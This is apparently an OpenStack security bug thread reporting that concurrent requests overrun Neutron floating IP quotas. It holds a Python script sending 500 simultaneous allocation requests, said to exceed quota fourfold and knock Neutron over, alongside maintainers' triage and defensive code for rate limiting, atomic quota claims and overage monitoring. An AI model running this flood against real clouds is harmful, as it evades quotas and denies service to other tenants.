Race condition while allocating floating IPs

Bug #1862050 reported by Rustam Komildzhonov
Affects                      Status     Importance  Assigned to  Milestone
OpenStack Security Advisory  Won't Fix  Undecided   Unassigned
neutron                      New        Undecided   Unassigned

Bug Description

I work as a penetration tester. In one of our recent projects our team encountered a problem in OpenStack, and we are not sure whether to consider it an OpenStack security vulnerability. We hope you can clarify things for us.

We were testing for race condition vulnerabilities on resources that have a per-project limit, for example the number of floating IPs.
The idea is to make the backend server receive many identical requests at the same moment; because the server has to process all of them simultaneously, we can reach a state where the limits are not checked properly.

Sending 500 requests (each in an individual thread) directly to the Neutron API to allocate floating IPs resulted in exceeding the floating IP limit by a factor of four.

Request example:

POST /v2.0/floatingips HTTP/1.1
Host: ...
X-Auth-Token: ...
Content-Type: application/json
Content-Length: 103

{
    "floatingip": {
        "floating_network_id": "..."
    }
}
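
A reproduction sketch in Python (the endpoint URL, token, and network ID below are placeholders for the real deployment values):

import concurrent.futures
import requests

# Reproduction sketch: fire 500 concurrent allocation requests and
# count the response codes. All three values below are placeholders.
NEUTRON_URL = "https://neutron.example.com:9696"
TOKEN = "..."        # a valid Keystone token
NETWORK_ID = "..."   # UUID of the external network

def allocate(_):
    resp = requests.post(
        NEUTRON_URL + "/v2.0/floatingips",
        headers={"X-Auth-Token": TOKEN},
        json={"floatingip": {"floating_network_id": NETWORK_ID}},
    )
    return resp.status_code

with concurrent.futures.ThreadPoolExecutor(max_workers=500) as pool:
    codes = list(pool.map(allocate, range(500)))

# 201 = IP allocated, 409 = quota check rejected the request
print({code: codes.count(code) for code in set(codes)})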

Is this a known OpenStack behavior, or is it more of a hardware problem?

Tags: security
Revision history for this message
Jeremy Stanley (fungi) wrote :

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

description: updated
Changed in ossa:
status: New → Incomplete
Revision history for this message
Jeremy Stanley (fungi) wrote :

At first blush, this sounds like an impractical way to go about a denial of service attack, as it depends on an authenticated user and is likely to be fairly noisy with limited actual impact, but it might be a way for customers to avoid paying for additional quota depending on your billing model. As such I'd probably consider this a class C1 report (impractical but could still warrant a CVE) per our taxonomy: https://security.openstack.org/vmt-process.html#incident-report-taxonomy

If there's agreement from some Neutron core security reviewers (subscribed), we can probably continue this discussion as a regular public bug.

Revision history for this message
Rustam Komildzhonov (rumiljonov) wrote :

Actually yes, the 500-request test ended up in a DoS of Neutron. I would guess the same test against other time-consuming endpoints (e.g. creating an instance in Nova or creating a share in Manila) would have the same result. So I was wondering whether this is some kind of core problem with request queueing in OpenStack, or whether it should be handled by network devices rather than by OpenStack modules. It just doesn't seem right that a single person can disable a core module with 500 requests.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Generally, resource exhaustion due to rapid calls to expensive API methods by authenticated users is treated as a security hardening opportunity. Operators are recommended to place rate-limiting solutions in front of API endpoints to reduce the impact a user can cause (either intentionally or accidentally) by making rapid-fire requests. Since the account used can be readily identified and disabled, it's an expensive attack scenario unless the environment makes it easy for the attacker to obtain control of additional accounts. See the OpenStack Security Guide for relevant recommendations: https://docs.openstack.org/security-guide/api-endpoints/api-endpoint-configuration-recommendations.html#api-endpoint-rate-limiting
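
For illustration only, a simplistic per-token rate limiter expressed as Python WSGI middleware might look like the sketch below; in practice, operators would normally put haproxy, nginx, or a dedicated API gateway in front of the endpoint rather than anything like this:

import threading
import time

class RateLimitMiddleware:
    """Token-bucket limiter keyed on X-Auth-Token (sketch only)."""

    def __init__(self, app, rate=10, per=1.0):
        self.app = app
        self.rate, self.per = rate, per   # allow `rate` calls per `per` seconds
        self.buckets = {}                 # token -> (allowance, last_check)
        self.lock = threading.Lock()

    def __call__(self, environ, start_response):
        token = environ.get("HTTP_X_AUTH_TOKEN", "")
        now = time.monotonic()
        with self.lock:
            allowance, last = self.buckets.get(token, (self.rate, now))
            # Refill the bucket in proportion to elapsed time.
            allowance = min(self.rate,
                            allowance + (now - last) * self.rate / self.per)
            if allowance < 1.0:
                self.buckets[token] = (allowance, now)
                start_response("429 Too Many Requests",
                               [("Content-Type", "text/plain")])
                return [b"rate limit exceeded\n"]
            self.buckets[token] = (allowance - 1.0, now)
        return self.app(environ, start_response)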

Revision history for this message
Nate Johnston (nate-johnston) wrote :

Neutron does not enforce quotas in a way that guarantees a violation like this can never occur. The extent of the issue will vary greatly by deployment architecture, specifically with the number of Neutron API workers deployed: the more workers there are, the more probable an overage becomes.

This is part of the nature of Neutron as a distributed system. The fix for an issue like this would be to move quota calculations into the database, which would be an intrusive and far-reaching rearchitecture. Neutron does better when it can detect issues itself rather than having to handle database-reported errors and retries, so such an architectural change would have a significant negative effect on the reliability and responsiveness of the service under load. I do not believe that preventing minor quota overages justifies the return on investment for a change of that scope.
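
To illustrate why the current check-then-act pattern can race, and what a database-enforced check would look like, here is a minimal sketch (this is not Neutron's schema or code; it only shows the atomic-claim idea, using SQLite):

import sqlite3

# Sketch only: a single UPDATE both checks and consumes quota, so two
# concurrent requests cannot both pass the limit check the way separate
# "count, then insert" steps can.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE quota (project TEXT PRIMARY KEY,"
           " used INTEGER, hard_limit INTEGER)")
db.execute("INSERT INTO quota VALUES ('demo', 0, 50)")

def claim_floating_ip(conn, project):
    cur = conn.execute(
        "UPDATE quota SET used = used + 1"
        " WHERE project = ? AND used < hard_limit", (project,))
    conn.commit()
    return cur.rowcount == 1  # False means the quota is exhausted

print(claim_floating_ip(db, "demo"))  # True until 50 IPs are claimed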

The quota and current consumption are readily available from existing API endpoints. If a deployer were so motivated, a combination of log watching and occasional API polling by a process conforming to the deployer's business logic would permit these sorts of overages to be flagged and alarmed on, as in the sketch below. I think that would be a sufficient compensating control for the risk of quota overages.
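
A minimal polling sketch, assuming the standard Neutron quota and floating IP endpoints; the URL, token, and project ID are placeholders:

import requests

NEUTRON_URL = "https://neutron.example.com:9696"  # placeholder
TOKEN = "..."                                     # placeholder
PROJECT_ID = "..."                                # placeholder
HEADERS = {"X-Auth-Token": TOKEN}

# Compare the floating IP quota against actual consumption and flag
# any overage. Error handling and scheduling are omitted.
quota = requests.get(
    f"{NEUTRON_URL}/v2.0/quotas/{PROJECT_ID}",
    headers=HEADERS).json()["quota"]["floatingip"]
used = len(requests.get(
    f"{NEUTRON_URL}/v2.0/floatingips",
    headers=HEADERS,
    params={"project_id": PROJECT_ID}).json()["floatingips"])

if used > quota:
    print(f"ALERT: project {PROJECT_ID} holds {used} floating IPs,"
          f" quota is {quota}")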

Revision history for this message
Tristan Cacqueray (tristan-cacqueray) wrote :

I agree with the proposed C1 class, and I could go with B2 too, though there is already an OSSN about that issue.

Revision history for this message
Rustam Komildzhonov (rumiljonov) wrote :

Any decision on this?

Revision history for this message
Jeremy Stanley (fungi) wrote :

It seems we have reasonable consensus that this is expected behavior. We also have public documentation (at least in the Security Guide linked above, and likely elsewhere) indicating that OpenStack API servers on the whole make no attempt to mitigate excessively rapid calls to expensive methods, and so should be protected by a separate filtering or throttling mechanism if they are deployed in an environment where they are at risk of being overloaded.

I'll switch this to public and treat it as a class C1 report. If you or someone else feels this scenario should be covered by a CVE, feel free to request one from MITRE or another CNA, but please note it in a follow-up comment on this bug if you do, so that we don't end up with multiple CVE assignments floating around for the same scenario. Thanks!

description: updated
information type: Private Security → Public
Changed in ossa:
status: Incomplete → Won't Fix
tags: added: security
Revision history for this message
Nick Tait (nickthetait) wrote :

C1 seems appropriate as the risk is not inherent to all deployments and there are multiple ways to prevent/mitigate where needed.
